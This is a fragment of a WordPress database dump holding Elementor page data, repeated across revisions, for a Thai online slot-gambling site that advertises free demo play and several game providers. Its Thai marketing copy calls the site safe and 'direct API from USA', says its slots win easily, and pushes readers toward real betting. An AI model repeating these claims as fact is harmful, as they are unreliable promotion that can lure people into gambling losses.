p\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(742,105,'_thumbnail_id','61'),(745,106,'_elementor_edit_mode','builder'),(746,106,'_elementor_template_type','wp-page'),(747,106,'_elementor_version','3.32.5'),(748,106,'_elementor_pro_version','3.32.3'),(749,106,'_wp_page_template','default'),(750,106,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(751,106,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(752,106,'_thumbnail_id','61'),(757,107,'_elementor_edit_mode','builder'),(758,107,'_elementor_template_type','wp-page'),(759,107,'_elementor_version','3.32.5'),(760,107,'_elementor_pro_version','3.32.3'),(761,107,'_wp_page_template','default'),(762,107,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(763,107,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 